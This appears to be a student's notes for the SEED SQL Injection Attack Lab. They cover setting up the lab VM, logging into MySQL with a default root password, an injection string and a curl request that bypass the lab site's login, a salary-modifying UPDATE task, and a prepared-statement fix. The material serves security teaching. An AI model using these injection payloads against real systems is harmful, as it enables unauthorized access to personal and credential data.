SQL injection is a code injection technique that exploits the vulnerabilities in the interface between a web applications and a database server.  The SQL Injection Attack Lab document with instruction

Patch VM with SQL lab environment ================================================== 1) download and decompress patch file ------------------- wget http://mars.syr.edu/html/seed/patch.tar.gz tar -zxvf patch.tar.gz 2) test web page URL ----------------- http://www.SEEDLabSQLInjection.com 3) install curl software --------------------- sudo apt-get update sudo apt-get install curl 4) turn off protection ------------------- sudo gedit /etc/php5/apache2/php.ini sudo service apache2 restart Task 1: MySQL Console ================================================== 1) login MySQL Console ------------------- mysql -u root -pseedubuntu 2) show database table ------------------- show databases; use Users; show tables; SELECT * FROM credential; Task 2.1: SQL injection attack via webpage ================================================== 1) SQL injection string -------------------- 'or name='Admin';-- a 2) web application login logic --------------------------- SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE eid= '$input_eid' and Password='$input_pwd'; Task 2.2: SQL injection attack via command line ================================================== 1) curl get request ---------------- curl "http://www.seedlabsqlinjection.com/unsafe_credential.php?EID=%27%20or%20name=%27admin%27;--%20&Password=" Task 3.1: SQL Injection Attackk on UPDATE statement --- Modify Employees' Salary ================================================== 1) web application update profile logic ------------------------------------ UPDATE credential SET nickname='',email='',address='' where ID=1; Task 4: Countermeasure - Prepared Statement ================================================== 1) copy prepared statement php and link index.html to new php file --------------------------------------------------------------- sudo cp safe_credential.php /var/www/SQLInjection sudo gedit /var/www/SQLInjection/index.html